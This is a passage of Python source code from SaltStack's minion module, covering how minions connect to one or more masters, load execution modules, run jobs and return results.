self.opts['transport'] = trans
pub_channel = salt.transport.client.AsyncPubChannel.factory(self.opts, **factory_kwargs)
yield pub_channel.connect()
if not pub_channel.auth.authenticated:
continue
del self.opts['detect_mode']
break
else:
pub_channel = salt.transport.client.AsyncPubChannel.factory(self.opts, **factory_kwargs)
yield pub_channel.connect()
self.tok = pub_channel.auth.gen_token('salt')
self.connected = True
raise tornado.gen.Return((opts['master'], pub_channel))
except SaltClientError as exc:
if attempts == tries:
# Exhausted all attempts. Return exception.
self.connected = False
raise exc
class SMinion(MinionBase):
'''
Create an object that has loaded all of the minion module functions,
grains, modules, returners etc. The SMinion allows developers to
generate all of the salt minion functions and present them with these
functions for general use.
'''
def __init__(self, opts):
# Late setup of the opts grains, so we can log from the grains module
opts['grains'] = salt.loader.grains(opts)
super(SMinion, self).__init__(opts)
# Clean out the proc directory (default /var/cache/salt/minion/proc)
if (self.opts.get('file_client', 'remote') == 'remote'
or self.opts.get('use_master_when_local', False)):
if self.opts['transport'] == 'zeromq' and HAS_ZMQ:
io_loop = zmq.eventloop.ioloop.ZMQIOLoop()
else:
io_loop = LOOP_CLASS.current()
io_loop.run_sync(
lambda: self.eval_master(self.opts, failed=True)
)
self.gen_modules(initial_load=True)
# If configured, cache pillar data on the minion
if self.opts['file_client'] == 'remote' and self.opts.get('minion_pillar_cache', False):
import yaml
pdir = os.path.join(self.opts['cachedir'], 'pillar')
if not os.path.isdir(pdir):
os.makedirs(pdir, 0o700)
ptop = os.path.join(pdir, 'top.sls')
if self.opts['environment'] is not None:
penv = self.opts['environment']
else:
penv = 'base'
cache_top = {penv: {self.opts['id']: ['cache']}}
with salt.utils.fopen(ptop, 'wb') as fp_:
fp_.write(yaml.dump(cache_top))
os.chmod(ptop, 0o600)
cache_sls = os.path.join(pdir, 'cache.sls')
with salt.utils.fopen(cache_sls, 'wb') as fp_:
fp_.write(yaml.dump(self.opts['pillar']))
os.chmod(cache_sls, 0o600)
def gen_modules(self, initial_load=False):
'''
Load all of the modules for the minion
'''
self.utils = salt.loader.utils(self.opts)
self.functions = salt.loader.minion_mods(self.opts, utils=self.utils,
include_errors=True)
self.serializers = salt.loader.serializers(self.opts)
self.returners = salt.loader.returners(self.opts, self.functions)
self.proxy = salt.loader.proxy(self.opts, self.functions, self.returners, None)
# TODO: remove
self.function_errors = {} # Keep the funcs clean
self.states = salt.loader.states(self.opts,
self.functions,
self.utils,
self.serializers)
self.rend = salt.loader.render(self.opts, self.functions)
self.matcher = Matcher(self.opts, self.functions)
self.functions['sys.reload_modules'] = self.gen_modules
self.executors = salt.loader.executors(self.opts)
if self.opts.get('master_type') != 'disable':
self.opts['pillar'] = salt.pillar.get_pillar(
self.opts,
self.opts['grains'],
self.opts['id'],
self.opts['environment'],
pillarenv=self.opts.get('pillarenv'),
funcs=self.functions,
rend=self.rend,
).compile_pillar()
class MasterMinion(object):
'''
Create a fully loaded minion function object for generic use on the
master. What makes this class different is that the pillar is
omitted, otherwise everything else is loaded cleanly.
'''
def __init__(
self,
opts,
returners=True,
states=True,
rend=True,
matcher=True,
whitelist=None,
ignore_config_errors=True):
self.opts = salt.config.minion_config(opts['conf_file'], ignore_config_errors=ignore_config_errors)
self.opts.update(opts)
self.whitelist = whitelist
self.opts['grains'] = salt.loader.grains(opts)
self.opts['pillar'] = {}
self.mk_returners = returners
self.mk_states = states
self.mk_rend = rend
self.mk_matcher = matcher
self.gen_modules(initial_load=True)
def gen_modules(self, initial_load=False):
'''
Load all of the modules for the minion
'''
self.utils = salt.loader.utils(self.opts)
self.functions = salt.loader.minion_mods(
self.opts,
utils=self.utils,
whitelist=self.whitelist,
initial_load=initial_load)
self.serializers = salt.loader.serializers(self.opts)
if self.mk_returners:
self.returners = salt.loader.returners(self.opts, self.functions)
if self.mk_states:
self.states = salt.loader.states(self.opts,
self.functions,
self.utils,
self.serializers)
if self.mk_rend:
self.rend = salt.loader.render(self.opts, self.functions)
if self.mk_matcher:
self.matcher = Matcher(self.opts, self.functions)
self.functions['sys.reload_modules'] = self.gen_modules
class MinionManager(MinionBase):
'''
Create a multi minion interface, this creates as many minions as are
defined in the master option and binds each minion object to a respective
master.
'''
def __init__(self, opts):
super(MinionManager, self).__init__(opts)
self.auth_wait = self.opts['acceptance_wait_time']
self.max_auth_wait = self.opts['acceptance_wait_time_max']
self.minions = []
self.jid_queue = []
if HAS_ZMQ:
zmq.eventloop.ioloop.install()
self.io_loop = LOOP_CLASS.current()
def _bind(self):
# start up the event publisher, so we can see events during startup
self.event_publisher = salt.utils.event.AsyncEventPublisher(
self.opts,
io_loop=self.io_loop,
)
self.event = salt.utils.event.get_event('minion', opts=self.opts, io_loop=self.io_loop)
self.event.subscribe('')
self.event.set_event_handler(self.handle_event)
@tornado.gen.coroutine
def handle_event(self, package):
yield [minion.handle_event(package) for minion in self.minions]
def _create_minion_object(self, opts, timeout, safe,
io_loop=None, loaded_base_name=None,
jid_queue=None):
'''
Helper function to return the correct type of object
'''
return Minion(opts,
timeout,
safe,
io_loop=io_loop,
loaded_base_name=loaded_base_name,
jid_queue=jid_queue)
def _spawn_minions(self):
'''
Spawn all the coroutines which will sign in to masters
'''
masters = self.opts['master']
if self.opts['master_type'] == 'failover' or not isinstance(self.opts['master'], list):
masters = [masters]
for master in masters:
s_opts = copy.deepcopy(self.opts)
s_opts['master'] = master
s_opts['multimaster'] = True
minion = self._create_minion_object(s_opts,
s_opts['auth_timeout'],
False,
io_loop=self.io_loop,
loaded_base_name='salt.loader.{0}'.format(s_opts['master']),
jid_queue=self.jid_queue,
)
self.minions.append(minion)
self.io_loop.spawn_callback(self._connect_minion, minion)
@tornado.gen.coroutine
def _connect_minion(self, minion):
'''
Create a minion, and asynchronously connect it to a master
'''
last = 0 # never have we signed in
auth_wait = minion.opts['acceptance_wait_time']
while True:
try:
yield minion.connect_master()
minion.tune_in(start=False)
break
except SaltClientError as exc:
log.error('Error while bringing up minion for multi-master. Is master at {0} responding?'.format(minion.opts['master']))
last = time.time()
if auth_wait < self.max_auth_wait:
auth_wait += self.auth_wait
yield tornado.gen.sleep(auth_wait) # TODO: log?
except Exception as e:
log.critical('Unexpected error while connecting to {0}'.format(minion.opts['master']), exc_info=True)
# Multi Master Tune In
def tune_in(self):
'''
Bind to the masters
This loop will attempt to create connections to masters it hasn't connected
to yet, but once the initial connection is made it is up to ZMQ to do the
reconnect (don't know of an API to get the state here in salt)
'''
self._bind()
# Fire off all the minion coroutines
self._spawn_minions()
# serve forever!
self.io_loop.start()
@property
def restart(self):
for minion in self.minions:
if minion.restart:
return True
return False
def stop(self, signum):
for minion in self.minions:
minion.process_manager.stop_restarting()
minion.process_manager.send_signal_to_processes(signum)
# kill any remaining processes
minion.process_manager.kill_children()
minion.destroy()
def destroy(self):
for minion in self.minions:
minion.destroy()
def reload(self):
for minion in self.minions:
minion.reload()
class Minion(MinionBase):
'''
This class instantiates a minion, runs connections for a minion,
and loads all of the functions into the minion
'''
def __init__(self, opts, timeout=60, safe=True, loaded_base_name=None, io_loop=None, jid_queue=None): # pylint: disable=W0231
'''
Pass in the options dict
'''
# this means that the parent class doesn't know *which* master we connect to
super(Minion, self).__init__(opts)
self.timeout = timeout
self.safe = safe
self._running = None
self.win_proc = []
self.loaded_base_name = loaded_base_name
self.connected = False
self.restart = False
# Flag meaning minion has finished initialization including first connect to the master.
# True means the Minion is fully functional and ready to handle events.
self.ready = False
self.jid_queue = jid_queue
if io_loop is None:
if HAS_ZMQ:
zmq.eventloop.ioloop.install()
self.io_loop = LOOP_CLASS.current()
else:
self.io_loop = io_loop
# Warn if ZMQ < 3.2
if HAS_ZMQ:
try:
zmq_version_info = zmq.zmq_version_info()
except AttributeError:
# PyZMQ <= 2.1.9 does not have zmq_version_info, fall back to
# using zmq.zmq_version() and build a version info tuple.
zmq_version_info = tuple(
[int(x) for x in zmq.zmq_version().split('.')] # pylint: disable=no-member
)
if zmq_version_info < (3, 2):
log.warning(
'You have a version of ZMQ less than ZMQ 3.2! There are '
'known connection keep-alive issues with ZMQ < 3.2 which '
'may result in loss of contact with minions. Please '
'upgrade your ZMQ!'
)
# Late setup the of the opts grains, so we can log from the grains
# module. If this is a proxy, however, we need to init the proxymodule
# before we can get the grains. We do this for proxies in the
# post_master_init
if not salt.utils.is_proxy():
self.opts['grains'] = salt.loader.grains(opts)
log.info('Creating minion process manager')
self.process_manager = ProcessManager(name='MinionProcessManager')
self.io_loop.spawn_callback(self.process_manager.run, async=True)
# We don't have the proxy setup yet, so we can't start engines
# Engines need to be able to access __proxy__
if not salt.utils.is_proxy():
self.io_loop.spawn_callback(salt.engines.start_engines, self.opts,
self.process_manager)
# Install the SIGINT/SIGTERM handlers if not done so far
if signal.getsignal(signal.SIGINT) is signal.SIG_DFL:
# No custom signal handling was added, install our own
signal.signal(signal.SIGINT, self._handle_signals)
if signal.getsignal(signal.SIGTERM) is signal.SIG_DFL:
# No custom signal handling was added, install our own
signal.signal(signal.SIGTERM, self._handle_signals)
def _handle_signals(self, signum, sigframe): # pylint: disable=unused-argument
self._running = False
# escalate the signals to the process manager
self.process_manager.stop_restarting()
self.process_manager.send_signal_to_processes(signum)
# kill any remaining processes
self.process_manager.kill_children()
time.sleep(1)
sys.exit(0)
def sync_connect_master(self, timeout=None):
'''
Block until we are connected to a master
'''
self._sync_connect_master_success = False
log.debug("sync_connect_master")
def on_connect_master_future_done(future):
self._sync_connect_master_success = True
self.io_loop.stop()
self._connect_master_future = self.connect_master()
# finish connecting to master
self._connect_master_future.add_done_callback(on_connect_master_future_done)
if timeout:
self.io_loop.call_later(timeout, self.io_loop.stop)
try:
self.io_loop.start()
except KeyboardInterrupt:
self.destroy()
# I made the following 3 line oddity to preserve traceback.
# Please read PR #23978 before changing, hopefully avoiding regressions.
# Good luck, we're all counting on you. Thanks.
future_exception = self._connect_master_future.exc_info()
if future_exception:
# This needs to be re-raised to preserve restart_on_error behavior.
raise six.reraise(*future_exception)
if timeout and self._sync_connect_master_success is False:
raise SaltDaemonNotRunning('Failed to connect to the salt-master')
def reload(self):
log.info('Minion reloading config')
disk_opts = salt.config.minion_config(os.path.join(salt.syspaths.CONFIG_DIR, 'minion')) # FIXME POC
self.opts = salt.utils.dictupdate.merge_overwrite(self.opts, disk_opts)
self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
self.schedule.functions = self.functions
self.schedule.returners = self.returners
@tornado.gen.coroutine
def connect_master(self):
'''
Return a future which will complete when you are connected to a master
'''
master, self.pub_channel = yield self.eval_master(self.opts, self.timeout, self.safe)
yield self._post_master_init(master)
# TODO: better name...
@tornado.gen.coroutine
def _post_master_init(self, master):
'''
Function to finish init after connecting to a master
This is primarily loading modules, pillars, etc. (since they need
to know which master they connected to)
If this function is changed, please check ProxyMinion._post_master_init
to see if those changes need to be propagated.
Minions and ProxyMinions need significantly different post master setups,
which is why the differences are not factored out into separate helper
functions.
'''
if self.connected:
self.opts['master'] = master
# Initialize pillar before loader to make pillar accessible in modules
self.opts['pillar'] = yield salt.pillar.get_async_pillar(
self.opts,
self.opts['grains'],
self.opts['id'],
self.opts['environment'],
pillarenv=self.opts.get('pillarenv')
).compile_pillar()
self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
self.serial = salt.payload.Serial(self.opts)
self.mod_opts = self._prep_mod_opts()
self.matcher = Matcher(self.opts, self.functions)
self.beacons = salt.beacons.Beacon(self.opts, self.functions)
uid = salt.utils.get_uid(user=self.opts.get('user', None))
self.proc_dir = get_proc_dir(self.opts['cachedir'], uid=uid)
self.schedule = salt.utils.schedule.Schedule(
self.opts,
self.functions,
self.returners,
cleanup=[master_event(type='alive')])
# add default scheduling jobs to the minions scheduler
if self.opts['mine_enabled'] and 'mine.update' in self.functions:
self.schedule.add_job({
'__mine_interval':
{
'function': 'mine.update',
'minutes': self.opts['mine_interval'],
'jid_include': True,
'maxrunning': 2,
'return_job': self.opts.get('mine_return_job', False)
}
}, persist=True)
log.info('Added mine.update to scheduler')
else:
self.schedule.delete_job('__mine_interval', persist=True)
# add master_alive job if enabled
if (self.opts['transport'] != 'tcp' and
self.opts['master_alive_interval'] > 0 and
self.connected):
self.schedule.add_job({
master_event(type='alive', master=self.opts['master']):
{
'function': 'status.master',
'seconds': self.opts['master_alive_interval'],
'jid_include': True,
'maxrunning': 1,
'return_job': False,
'kwargs': {'master': self.opts['master'],
'connected': True}
}
}, persist=True)
if self.opts['master_failback'] and \
'master_list' in self.opts and \
self.opts['master'] != self.opts['master_list'][0]:
self.schedule.add_job({
master_event(type='failback'):
{
'function': 'status.ping_master',
'seconds': self.opts['master_failback_interval'],
'jid_include': True,
'maxrunning': 1,
'return_job': False,
'kwargs': {'master': self.opts['master_list'][0]}
}
}, persist=True)
else:
self.schedule.delete_job(master_event(type='failback'), persist=True)
else:
self.schedule.delete_job(master_event(type='alive', master=self.opts['master']), persist=True)
self.schedule.delete_job(master_event(type='failback'), persist=True)
self.grains_cache = self.opts['grains']
self.ready = True
def _return_retry_timer(self):
'''
Based on the minion configuration, either return a randomized timer or
just return the value of the return_retry_timer.
'''
msg = 'Minion return retry timer set to {0} seconds'
if self.opts.get('return_retry_timer_max'):
try:
random_retry = randint(self.opts['return_retry_timer'], self.opts['return_retry_timer_max'])
log.debug(msg.format(random_retry) + ' (randomized)')
return random_retry
except ValueError:
# Catch wiseguys using negative integers here
log.error(
'Invalid value (return_retry_timer: {0} or return_retry_timer_max: {1})'
'both must be a positive integers'.format(
self.opts['return_retry_timer'],
self.opts['return_retry_timer_max'],
)
)
log.debug(msg.format(DEFAULT_MINION_OPTS['return_retry_timer']))
return DEFAULT_MINION_OPTS['return_retry_timer']
else:
log.debug(msg.format(self.opts.get('return_retry_timer')))
return self.opts.get('return_retry_timer')
def _prep_mod_opts(self):
'''
Returns a copy of the opts with key bits stripped out
'''
mod_opts = {}
for key, val in six.iteritems(self.opts):
if key == 'logger':
continue
mod_opts[key] = val
return mod_opts
def _load_modules(self, force_refresh=False, notify=False, grains=None):
'''
Return the functions and the returners loaded up from the loader
module
'''
# if this is a *nix system AND modules_max_memory is set, lets enforce
# a memory limit on module imports
# this feature ONLY works on *nix like OSs (resource module doesn't work on windows)
modules_max_memory = False
if self.opts.get('modules_max_memory', -1) > 0 and HAS_PSUTIL and HAS_RESOURCE:
log.debug('modules_max_memory set, enforcing a maximum of {0}'.format(self.opts['modules_max_memory']))
modules_max_memory = True
old_mem_limit = resource.getrlimit(resource.RLIMIT_AS)
rss, vms = psutil.Process(os.getpid()).memory_info()
mem_limit = rss + vms + self.opts['modules_max_memory']
resource.setrlimit(resource.RLIMIT_AS, (mem_limit, mem_limit))
elif self.opts.get('modules_max_memory', -1) > 0:
if not HAS_PSUTIL:
log.error('Unable to enforce modules_max_memory because psutil is missing')
if not HAS_RESOURCE:
log.error('Unable to enforce modules_max_memory because resource is missing')
# This might be a proxy minion
if hasattr(self, 'proxy'):
proxy = self.proxy
else:
proxy = None
if grains is None:
self.opts['grains'] = salt.loader.grains(self.opts, force_refresh, proxy=proxy)
self.utils = salt.loader.utils(self.opts)
if self.opts.get('multimaster', False):
s_opts = copy.deepcopy(self.opts)
functions = salt.loader.minion_mods(s_opts, utils=self.utils, proxy=proxy,
loaded_base_name=self.loaded_base_name, notify=notify)
else:
functions = salt.loader.minion_mods(self.opts, utils=self.utils, notify=notify, proxy=proxy)
returners = salt.loader.returners(self.opts, functions)
errors = {}
if '_errors' in functions:
errors = functions['_errors']
functions.pop('_errors')
# we're done, reset the limits!
if modules_max_memory is True:
resource.setrlimit(resource.RLIMIT_AS, old_mem_limit)
executors = salt.loader.executors(self.opts, functions)
return functions, returners, errors, executors
def _send_req_sync(self, load, timeout):
channel = salt.transport.Channel.factory(self.opts)
return channel.send(load, timeout=timeout)
@tornado.gen.coroutine
def _send_req_async(self, load, timeout):
channel = salt.transport.client.AsyncReqChannel.factory(self.opts)
ret = yield channel.send(load, timeout=timeout)
raise tornado.gen.Return(ret)
def _fire_master(self, data=None, tag=None, events=None, pretag=None, timeout=60, sync=True):
'''
Fire an event on the master, or drop message if unable to send.
'''
load = {'id': self.opts['id'],
'cmd': '_minion_event',
'pretag': pretag,
'tok': self.tok}
if events:
load['events'] = events
elif data and tag:
load['data'] = data
load['tag'] = tag
elif not data and tag:
load['data'] = {}
load['tag'] = tag
else:
return
def timeout_handler(*_):
log.info('fire_master failed: master could not be contacted. Request timed out.')
return True
if sync:
try:
self._send_req_sync(load, timeout)
except salt.exceptions.SaltReqTimeoutError:
log.info('fire_master failed: master could not be contacted. Request timed out.')
return False
except Exception:
log.info('fire_master failed: {0}'.format(traceback.format_exc()))
return False
else:
with tornado.stack_context.ExceptionStackContext(timeout_handler):
self._send_req_async(load, timeout, callback=lambda f: None) # pylint: disable=unexpected-keyword-arg
return True
def _handle_decoded_payload(self, data):
'''
Override this method if you wish to handle the decoded data
differently.
'''
if 'user' in data:
log.info(
'User {0[user]} Executing command {0[fun]} with jid '
'{0[jid]}'.format(data)
)
else:
log.info(
'Executing command {0[fun]} with jid {0[jid]}'.format(data)
)
log.debug('Command details {0}'.format(data))
# Don't duplicate jobs
log.trace('Started JIDs: {0}'.format(self.jid_queue))
if self.jid_queue is not None:
if data['jid'] in self.jid_queue:
return
else:
self.jid_queue.append(data['jid'])
if len(self.jid_queue) > self.opts['minion_jid_queue_hwm']:
self.jid_queue.pop(0)
if isinstance(data['fun'], six.string_types):
if data['fun'] == 'sys.reload_modules':
self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
self.schedule.functions = self.functions
self.schedule.returners = self.returners
# We stash an instance references to allow for the socket
# communication in Windows. You can't pickle functions, and thus
# python needs to be able to reconstruct the reference on the other
# side.
instance = self
multiprocessing_enabled = self.opts.get('multiprocessing', True)
if multiprocessing_enabled:
if sys.platform.startswith('win'):
# let python reconstruct the minion on the other side if we're
# running on windows
instance = None
with default_signals(signal.SIGINT, signal.SIGTERM):
process = SignalHandlingMultiprocessingProcess(
target=self._target, args=(instance, self.opts, data, self.connected)
)
else:
process = threading.Thread(
target=self._target,
args=(instance, self.opts, data, self.connected),
name=data['jid']
)
if multiprocessing_enabled:
with default_signals(signal.SIGINT, signal.SIGTERM):
# Reset current signals before starting the process in
# order not to inherit the current signal handlers
process.start()
else:
process.start()
# TODO: remove the windows specific check?
if multiprocessing_enabled and not salt.utils.is_windows():
# we only want to join() immediately if we are daemonizing a process
process.join()
else:
self.win_proc.append(process)
def ctx(self):
'''Return a single context manager for the minion's data
'''
if six.PY2:
return contextlib.nested(
self.functions.context_dict.clone(),
self.returners.context_dict.clone(),
self.executors.context_dict.clone(),
)
else:
exitstack = contextlib.ExitStack()
exitstack.push(self.functions.context_dict.clone())
exitstack.push(self.returners.context_dict.clone())
exitstack.push(self.executors.context_dict.clone())
return exitstack
@classmethod
def _target(cls, minion_instance, opts, data, connected):
if not minion_instance:
minion_instance = cls(opts)
minion_instance.connected = connected
if not hasattr(minion_instance, 'functions'):
functions, returners, function_errors, executors = (
minion_instance._load_modules(grains=opts['grains'])
)
minion_instance.functions = functions
minion_instance.returners = returners
minion_instance.function_errors = function_errors
minion_instance.executors = executors
if not hasattr(minion_instance, 'serial'):
minion_instance.serial = salt.payload.Serial(opts)
if not hasattr(minion_instance, 'proc_dir'):
uid = salt.utils.get_uid(user=opts.get('user', None))
minion_instance.proc_dir = (
get_proc_dir(opts['cachedir'], uid=uid)
)
with tornado.stack_context.StackContext(minion_instance.ctx):
if isinstance(data['fun'], tuple) or isinstance(data['fun'], list):
Minion._thread_multi_return(minion_instance, opts, data)
else:
Minion._thread_return(minion_instance, opts, data)
@classmethod
def _thread_return(cls, minion_instance, opts, data):
'''
This method should be used as a threading target, start the actual
minion side execution.
'''
fn_ = os.path.join(minion_instance.proc_dir, data['jid'])
if opts['multiprocessing'] and not salt.utils.is_windows():
# Shutdown the multiprocessing before daemonizing
salt.log.setup.shutdown_multiprocessing_logging()
salt.utils.daemonize_if(opts)
# Reconfigure multiprocessing logging after daemonizing
salt.log.setup.setup_multiprocessing_logging()
salt.utils.appendproctitle('{0}._thread_return {1}'.format(cls.__name__, data['jid']))
sdata = {'pid': os.getpid()}
sdata.update(data)
log.info('Starting a new job with PID {0}'.format(sdata['pid']))
with salt.utils.fopen(fn_, 'w+b') as fp_:
fp_.write(minion_instance.serial.dumps(sdata))
ret = {'success': False}
function_name = data['fun']
if function_name in minion_instance.functions:
try:
if minion_instance.connected and minion_instance.opts['pillar'].get('minion_blackout', False):
# this minion is blacked out. Only allow saltutil.refresh_pillar
if function_name != 'saltutil.refresh_pillar' and \
function_name not in minion_instance.opts['pillar'].get('minion_blackout_whitelist', []):
raise SaltInvocationError('Minion in blackout mode. Set \'minion_blackout\' '
'to False in pillar to resume operations. Only '
'saltutil.refresh_pillar allowed in blackout mode.')
func = minion_instance.functions[function_name]
args, kwargs = load_args_and_kwargs(
func,
data['arg'],
data)
minion_instance.functions.pack['__context__']['retcode'] = 0
executors = data.get('module_executors') or opts.get('module_executors', ['direct_call.get'])
if isinstance(executors, six.string_types):
executors = [executors]
elif not isinstance(executors, list) or not executors:
raise SaltInvocationError("Wrong executors specification: {0}. String or non-empty list expected".
format(executors))
if opts.get('sudo_user', '') and executors[-1] != 'sudo.get':
if executors[-1] in FUNCTION_EXECUTORS:
executors[-1] = 'sudo.get' # replace
else:
executors.append('sudo.get') # append
log.trace('Executors list {0}'.format(executors)) # pylint: disable=no-member
# Get executors
def get_executor(name):
executor_class = minion_instance.executors.get(name)
if executor_class is None:
raise SaltInvocationError("Executor '{0}' is not available".format(name))
return executor_class
# Get the last one that is function executor
executor = get_executor(executors.pop())(opts, data, func, args, kwargs)
# Instantiate others from bottom to the top
for executor_name in reversed(executors):
executor = get_executor(executor_name)(opts, data, executor)
return_data = executor.execute()
if isinstance(return_data, types.GeneratorType):
ind = 0
iret = {}
for single in return_data:
if isinstance(single, dict) and isinstance(iret, dict):
iret.update(single)
else:
if not iret:
iret = []
iret.append(single)
tag = tagify([data['jid'], 'prog', opts['id'], str(ind)], 'job')
event_data = {'return': single}
minion_instance._fire_master(event_data, tag)
ind += 1
ret['return'] = iret
else:
ret['return'] = return_data
ret['retcode'] = minion_instance.functions.pack['__context__'].get(
'retcode',
0
)
ret['success'] = True
except CommandNotFoundError as exc:
msg = 'Command required for \'{0}\' not found'.format(
function_name
)
log.debug(msg, exc_info=True)
ret['return'] = '{0}: {1}'.format(msg, exc)
ret['out'] = 'nested'
except CommandExecutionError as exc:
log.error(
'A command in \'{0}\' had a problem: {1}'.format(
function_name,
exc
),
exc_info_on_loglevel=logging.DEBUG
)
ret['return'] = 'ERROR: {0}'.format(exc)
ret['out'] = 'nested'
except SaltInvocationError as exc:
log.error(
'Problem executing \'{0}\': {1}'.format(
function_name,
exc
),
exc_info_on_loglevel=logging.DEBUG
)
ret['return'] = 'ERROR executing \'{0}\': {1}'.format(
function_name, exc
)
ret['out'] = 'nested'
except TypeError as exc:
msg = 'Passed invalid arguments to {0}: {1}\n{2}'.format(function_name, exc, func.__doc__, )
log.warning(msg, exc_info_on_loglevel=logging.DEBUG)
ret['return'] = msg
ret['out'] = 'nested'
except Exception:
msg = 'The minion function caused an exception'
log.warning(msg, exc_info_on_loglevel=True)
salt.utils.error.fire_exception(salt.exceptions.MinionError(msg), opts, job=data)
ret['return'] = '{0}: {1}'.format(msg, traceback.format_exc())
ret['out'] = 'nested'
else:
ret['return'] = minion_instance.functions.missing_fun_string(function_name)
mod_name = function_name.split('.')[0]
if mod_name in minion_instance.function_errors:
ret['return'] += ' Possible reasons: \'{0}\''.format(
minion_instance.function_errors[mod_name]
)
ret['success'] = False
ret['retcode'] = 254
ret['out'] = 'nested'
ret['jid'] = data['jid']
ret['fun'] = data['fun']
ret['fun_args'] = data['arg']
if 'master_id' in data:
ret['master_id'] = data['master_id']
if 'metadata' in data:
if isinstance(data['metadata'], dict):
ret['metadata'] = data['metadata']
else:
log.warning('The metadata parameter must be a dictionary. Ignoring.')
if minion_instance.connected:
minion_instance._return_pub(
ret,
timeout=minion_instance._return_retry_timer()
)
# TODO: make a list? Seems odd to split it this late :/
if data['ret'] and isinstance(data['ret'], six.string_types):
if 'ret_config' in data:
ret['ret_config'] = data['ret_config']
if 'ret_kwargs' in data:
ret['ret_kwargs'] = data['ret_kwargs']
ret['id'] = opts['id']
for returner in set(data['ret'].split(',')):
try:
minion_instance.returners['{0}.returner'.format(
returner
)](ret)
except Exception as exc:
log.error(
'The return failed for job {0} {1}'.format(
data['jid'],
exc
)
)
log.error(traceback.format_exc())
@classmethod
def _thread_multi_return(cls, minion_instance, opts, data):
'''
This method should be used as a threading target, start the actual
minion side execution.
'''
salt.utils.appendproctitle('{0}._thread_multi_return {1}'.format(cls.__name__, data['jid']))
ret = {
'return': {},
'retcode': {},
'success': {}
}
for ind in range(0, len(data['fun'])):
ret['success'][data['fun'][ind]] = False
try:
if minion_instance.connected and minion_instance.opts['pillar'].get('minion_blackout', False):
# this minion is blacked out. Only allow saltutil.refresh_pillar
if data['fun'][ind] != 'saltutil.refresh_pillar' and \
data['fun'][ind] not in minion_instance.opts['pillar'].get('minion_blackout_whitelist', []):
raise SaltInvocationError('Minion in blackout mode. Set \'minion_blackout\' '
'to False in pillar to resume operations. Only '
'saltutil.refresh_pillar allowed in blackout mode.')
func = minion_instance.functions[data['fun'][ind]]
args, kwargs = load_args_and_kwargs(
func,
data['arg'][ind],
data)
minion_instance.functions.pack['__context__']['retcode'] = 0
ret['return'][data['fun'][ind]] = func(*args, **kwargs)
ret['retcode'][data['fun'][ind]] = minion_instance.functions.pack['__context__'].get(
'retcode',
0
)
ret['success'][data['fun'][ind]] = True
except Exception as exc:
trb = traceback.format_exc()
log.warning(
'The minion function caused an exception: {0}'.format(
exc
)
)
ret['return'][data['fun'][ind]] = trb
ret['jid'] = data['jid']
ret['fun'] = data['fun']
ret['fun_args'] = data['arg']
if 'metadata' in data:
ret['metadata'] = data['metadata']
if minion_instance.connected:
minion_instance._return_pub(
ret,
timeout=minion_instance._return_retry_timer()
)
if data['ret']:
if 'ret_config' in data:
ret['ret_config'] = data['ret_config']
if 'ret_kwargs' in data:
ret['ret_kwargs'] = data['ret_kwargs']
for returner in set(data['ret'].split(',')):
ret['id'] = opts['id']
try:
minion_instance.returners['{0}.returner'.format(
returner
)](ret)
except Exception as exc:
log.error(
'The return failed for job {0} {1}'.format(
data['jid'],
exc
)
)
def _return_pub(self, ret, ret_cmd='_return', timeout=60, sync=True):
'''
Return the data from the executed command to the master server
'''
jid = ret.get('jid', ret.get('__jid__'))
fun = ret.get('fun', ret.get('__fun__'))
if self.opts['multiprocessing']:
fn_ = os.path.join(self.proc_dir, jid)
if os.path.isfile(fn_):
try:
os.remove(fn_)
except (OSError, IOError):
# The file is gone already
pass
log.info('Returning information for job: {0}'.format(jid))
if ret_cmd == '_syndic_return':
load = {'cmd': ret_cmd,
'id': self.opts['id'],
'jid': jid,
'fun': fun,
'arg': ret.get('arg'),
'tgt': ret.get('tgt'),
'tgt_type': ret.get('tgt_type'),
'load': ret.get('__load__')}
if '__master_id__' in ret:
load['master_id'] = ret['__master_id__']
load['return'] = {}
for key, value in six.iteritems(ret):
if key.startswith('__'):
continue
load['return'][key] = value
else:
load = {'cmd': ret_cmd,
'id': self.opts['id']}
for key, value in six.iteritems(ret):
load[key] = value
if 'out' in ret:
if isinstance(ret['out'], six.string_types):
load['out'] = ret['out']
else:
log.error('Invalid outputter {0}. This is likely a bug.'
.format(ret['out']))
else:
try:
oput = self.functions[fun].__outputter__
except (KeyError, AttributeError, TypeError):
pass
else:
if isinstance(oput, six.string_types):
load['out'] = oput
if self.opts['cache_jobs']:
# Local job cache has been enabled
salt.utils.minion.cache_jobs(self.opts, load['jid'], ret)
if not self.opts['pub_ret']:
return ''
def timeout_handler(*_):
msg = ('The minion failed to return the job information for job '
'{0}. This is often due to the master being shut down or '
'overloaded. If the master is running consider increasing '
'the worker_threads value.').format(jid)
log.warning(msg)
return True
if sync:
try:
ret_val = self._send_req_sync(load, timeout=timeout)
except SaltReqTimeoutError:
timeout_handler()
return ''
else:
with tornado.stack_context.ExceptionStackContext(timeout_handler):
ret_val = self._send_req_async(load, timeout=timeout, callback=lambda f: None) # pylint: disable=unexpected-keyword-arg
log.trace('ret_val = {0}'.format(ret_val)) # pylint: disable=no-member
return ret_val
def _state_run(self):
'''
Execute a state run based on information set in the minion config file
'''
if self.opts['startup_states']:
if self.opts.get('master_type', 'str') == 'disable' and \
self.opts.get('file_client', 'remote') == 'remote':
log.warning('Cannot run startup_states when \'master_type\' is '
'set to \'disable\' and \'file_client\' is set to '
'\'remote\'. Skipping.')
else:
data = {'jid': 'req', 'ret': self.opts.get('ext_job_cache', '')}
if self.opts['startup_states'] == 'sls':
data['fun'] = 'state.sls'
data['arg'] = [self.opts['sls_list']]
elif self.opts['startup_states'] == 'top':
data['fun'] = 'state.top'
data['arg'] = [self.opts['top_file']]
else:
data['fun'] = 'state.highstate'
data['arg'] = []
self._handle_decoded_payload(data)
def _refresh_grains_watcher(self, refresh_interval_in_minutes):
'''
Create a loop that will fire a pillar refresh to inform a master about a change in the grains of this minion
:param refresh_interval_in_minutes:
:return: None
'''
if '__update_grains' not in self.opts.get('schedule', {}):
if 'schedule' not in self.opts:
self.opts['schedule'] = {}
self.opts['schedule'].update({
'__update_grains':
{
'function': 'event.fire',
'args': [{}, 'grains_refresh'],
'minutes': refresh_interval_in_minutes
}
})
def _fire_master_minion_start(self):
# Send an event to the master that the minion is live
self._fire_master(
'Minion {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
'minion_start'
)
# dup name spaced event
self._fire_master(
'Minion {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
